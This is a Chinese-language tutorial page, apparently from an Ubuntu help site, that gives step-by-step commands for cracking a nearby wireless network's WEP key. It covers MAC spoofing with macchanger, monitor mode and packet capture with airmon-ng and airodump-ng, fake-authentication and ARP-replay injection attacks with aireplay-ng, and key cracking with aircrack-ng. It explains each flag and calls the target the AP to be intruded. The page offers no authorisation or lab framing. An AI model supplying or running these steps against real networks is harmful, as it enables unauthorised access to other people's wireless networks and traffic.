为扩展大家思路及抛砖引玉,这里不再使用BackTrack2,而是使用另外一款也很受欢迎的操作系统Ubuntu作为破解平台.在图形界面中,打开一个Shell,如下图,
输入ifconfig -a 察看当前网卡这里我就使用USB网卡为例,可以看到有一个名为rausb0的网卡,状态是未载入,这里先不要载入,先将MAC地址修改成需伪造的任意MAC地址,输入macchanger –m 00:11:22:33:44:55 rausb0-m后跟要伪造的MAC,之后再跟要修改的网卡名即可,这里我们将该USB网卡MAC修改成00:11:22:33:44:55然后再载入网卡,输入:ifconfig -a rausb0 up来载入USB网卡驱动下来,我们可以使用如Kismet、Airosnort等工具来扫描当前无线网络的AP,然后,我们需要将网卡激活成monitor模式,才可以进行后续的破解,命令如下:airmon-ng start rausb0 3,这里这个3就是我们发现的AP的频道,然后输入下列命令开始抓包airodump-ng -w test.cap --channel 3 rausb0 ,这里test.cap就是我设置的抓包文件名下来,就可以进行FakeAuth攻击,这种攻击就是专门在预攻击无线接入点AP没有客户端活动甚至不存在Client的情况下使用的。具体命令如下:aireplay-ng -1 1 -e AP’s ESSID -a AP’s MAC -h FakeMAC rausb0这里-1指的就是采用FakeAuth攻击模式,后面跟延迟;-e后面跟AP的ESSID,-a后面设置AP的MAC,-h后面则是前面伪造的MAC,最后是无线网卡。与此同时,为了IVs(初始化向量)的获取,必须进行ArpRequest注入式攻击,这个很重要,可以有效提高抓包数量及破解速度,命令如下aireplay-ng -3 -b AP"s MAC -h Client"s MAC -x 1024 rausb0解释一下:-3指的是采取ArpRequest注入攻击方式,-b后面跟上要入侵的AP的MAC地址,-h后面跟的是监测到的客户端MAC地址,这里我们使用刚才伪造的客户端MAC,如上图中显示的,至于-x 1024指的是定义每秒发送数据包数量,这个值可以小一些,但最高1024就可以了,这里我使用默认,最后是指定USB无线网卡接下来,就可以同步开启aircrack-ng来进行同步破解了,命令如下:aircrack-ng -x -f 2 test-01.cap这里-x是暴力破解模式,-f指的是启用密码复杂度为2 ,后面是我们即时保存的那个抓包文件,一些常用的Linux系统伪装方法讲解使Linux服务器更加安全的技巧相关资讯 Ubuntu教程
- Ubuntu教程 - 使用Ubuntu拷贝CD和 (12/18/2013 14:38:16)
- 让Ubuntu 12.10支持RAR和7Z文件解 (11/15/2012 18:51:50)
- Windows 7硬盘安装Ubuntu 12.10图 (11/03/2012 19:22:47)
| - 完美安装Ubuntu 12.10最新AMD显卡 (11/27/2012 08:17:47)
- Win 7硬盘安装Ubuntu 12.10 (11/05/2012 13:30:34)
- 虚拟机上Ubuntu 11.10升级到12.04 (10/12/2012 20:00:38)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转
|